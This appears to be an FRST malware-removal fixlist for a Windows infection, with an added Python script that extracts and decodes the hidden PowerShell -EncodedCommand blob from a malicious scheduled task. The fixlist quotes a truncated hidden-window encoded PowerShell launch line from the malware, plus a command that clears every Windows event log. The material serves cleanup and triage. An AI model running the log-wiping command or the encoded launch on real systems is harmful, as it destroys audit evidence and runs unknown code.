(explorer.exe ->) (Entertainment application) [File not signed] C:\Users\olyti\AppData\Roaming\Entertainment\Entertainment.exe
HKU\S-1-5-21-3139933802-399766682-36797096-1001\...\Run: [Entertainment] => C:\Users\olyti\AppData\Roaming\Entertainment\Entertainment.exe [134353921 2022-06-13] (Entertainment application) [File not signed] <==== ATTENTION
C:\Users\olyti\AppData\Roaming\Entertainment
Task: {4766F956-3269-4F79-B2A1-0848C9AF8390} - System32\Tasks\chrome accessibility => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAkAGoAdgBBAHIAPQAkAG4AdQBsAGwAOwAKACQAZABfAHYAYQByACAAPQAgACIAMgAzACIAOwAKAAoACgAkAHMAdAByAF8ARQBOAEMAXwBBAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABtAHAAYQByACAAPQAgACIAVwB5AE (the data entry has 5407 more characters). <==== ATTENTION
2022-10-20 16:03 - 2022-10-20 16:03 - 000014906 _____ C:\WINDOWS\system32\Tasks\chrome accessibility
2022-10-20 08:37 - 2022-10-20 08:37 - 000000000 ____D C:\Users\olyti\AppData\Local\chrome_accessibility
2022-10-18 07:23 - 2022-10-18 07:23 - 000000000 ____D C:\Users\olyti\AppData\Local\Entertainment
2022-10-18 07:23 - 2022-06-13 02:52 - 000000000 ____D C:\Users\olyti\AppData\Roaming\Entertainment
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
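The Task: entry in the fixlist above launches PowerShell through cmd with a hidden window and a base64 -E payload, which is the pattern worth checking before the task is deleted: decode the blob and read what it does. The Python below is an added example, not part of the fixlist, of FRST or of the malware; the function names, the regexes and the sample command line are constructed for this page, and the only real data in it is the base64 prefix that the page shows (the page cuts the payload after that prefix, so the decoder tolerates a truncated blob rather than failing on it).

```python
"""Added example: pull the -EncodedCommand argument out of a scheduled-task
command line, decode it (base64 over UTF-16LE) and flag the launch pattern.
Helper names are invented for this page; this is not an FRST feature."""
import base64
import re
from typing import Optional

# Visible part of the -E blob from the Task: line above. The real payload
# continues for about 5400 more characters that the page does not show.
ENCODED_PREFIX = (
    "CgAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAkAGoAdgBBAHIAPQAkAG4AdQBsAGwAOwAKACQAZABfAHYA"
    "YQByACAAPQAgACIAMgAzACIAOwAKAAoACgAkAHMAdAByAF8ARQBOAEMAXwBBAHMAYwA9AFsAUwB5AHMA"
    "dABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABtAHAA"
    "YQByACAAPQAgACIAVwB5AE"
)

# Constructed sample: the task's command line as FRST prints it, with the blob
# cut at the same point as on the page.
SAMPLE_TASK_LINE = (
    "Task: {4766F956-3269-4F79-B2A1-0848C9AF8390} - System32\\Tasks\\chrome accessibility"
    ' => cmd /c powershell -WindowStyle Hidden -E "' + ENCODED_PREFIX + '"'
)

# powershell.exe accepts -EncodedCommand abbreviated as -e, -ec, -en, -enc, ...;
# -ex / -ep (ExecutionPolicy) must not match.
_ENC_FLAG = re.compile(r'(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{8,})')


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand, or None if there is none."""
    m = _ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand value (base64 of UTF-16LE script text).

    Tolerates a blob that was cut short, as FRST and log viewers do: a lone
    trailing base64 character carries fewer than 8 bits and is dropped, an
    incomplete quartet is completed with '=' padding, and a dangling half
    code unit at the end is dropped instead of raising.
    """
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", b64)   # strip quotes, '=', whitespace
    if len(b64) % 4 == 1:
        b64 = b64[:-1]
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def triage_task_command(cmdline: str) -> dict:
    """Flag the launch pattern and return the first non-empty decoded lines."""
    enc = extract_encoded_command(cmdline)
    result = {
        "encoded_command": enc is not None,
        "hidden_window": bool(re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline)),
        "cmd_wrapper": bool(re.search(r"(?i)\bcmd(?:\.exe)?\s+/c\b", cmdline)),
        "decoded_head": [],
    }
    if enc is not None:
        lines = [ln for ln in decode_encoded_command(enc).splitlines() if ln.strip()]
        result["decoded_head"] = lines[:4]
    return result


if __name__ == "__main__":
    for key, value in triage_task_command(SAMPLE_TASK_LINE).items():
        print(f"{key}: {value}")
```

Run against the visible prefix, the decoder yields `$ok=$true`, `$jvAr=$null;`, `$d_var = "23";`, `$str_ENC_Asc=[System.Text.Encoding]::ASCII;` and then `$mpar = "Wy` where the page cuts off. `Wy` is how base64 text whose first byte is `[` begins, so the script evidently carries a further encoded stage; the page does not show the rest, so nothing more can be said about it here. The same three flags (encoded command, hidden window, cmd /c wrapper) are what a detection rule for this kind of task would key on.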